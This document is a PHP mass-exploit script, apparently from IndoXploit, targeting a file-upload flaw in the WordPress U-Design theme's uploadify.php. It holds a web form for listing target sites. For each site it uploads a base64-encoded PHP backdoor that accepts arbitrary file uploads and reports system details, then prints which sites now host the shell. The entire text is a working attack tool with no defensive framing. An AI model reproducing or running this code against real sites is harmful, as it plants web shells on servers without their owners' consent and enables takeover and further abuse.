WordPress U-Design Themes Uploadify Mass Xploiter

1. <html>
2. <center>
3. <form method="post" enctype="multipart/form-data">
4. Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php' required><br>
5. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
6. <input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
7. </form>
8. <?php
9. // IndoXploit
10. set_time_limit(0);
11. error_reporting(0);
12.  
13. function buffer() {
14.     ob_flush();
15.     flush();
16. }
17. function curl($url, $payload) {
18.     $ch = curl_init();
19.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
20.           curl_setopt($ch, CURLOPT_URL, $url);
21.           curl_setopt($ch, CURLOPT_POST, true);
22.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
23.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
24.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
25.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
26.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
27.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
28.           curl_setopt($ch, CURLOPT_HEADER, 0);
29.           curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
30.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
31.     $res = curl_exec($ch);
32.           curl_close($ch);
33.     return $res;
34. }
35. function cek($url) {
36.     $ch = curl_init();
37.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
38.           curl_setopt($ch, CURLOPT_URL, $url);
39.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
40.     $res = curl_exec($ch);
41.           curl_close($ch);
42.     return $res;
43. }
44. $file = htmlspecialchars($_POST['filename']);
45. $site = explode("\r\n", $_POST['url']);
46. $do = $_POST['exp'];
47. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIFUtRGVzaWduIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
48. if($do) {
49.     $idx_dir = mkdir("indoxploit_tools", 0755);
50.     $shell = "indoxploit_tools/".$file;
51.     $fopen = fopen($shell, "w");
52.     fwrite($fopen, $uploader);
53.     fclose($fopen);
54.     foreach($site as $url) {
55.         $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
56.         $data = array(
57.             "Filedata" => "@$shell"
58.             );
59.         $curl = curl($target, $data);
60.         if($curl) {
61.             $cek = cek($url.'/'.$file);
62.             if(preg_match("/IndoXploit/i", $cek)) {
63.                 echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
64.             }
65.         }
66.     buffer();
67.     }
68. }
69. ?>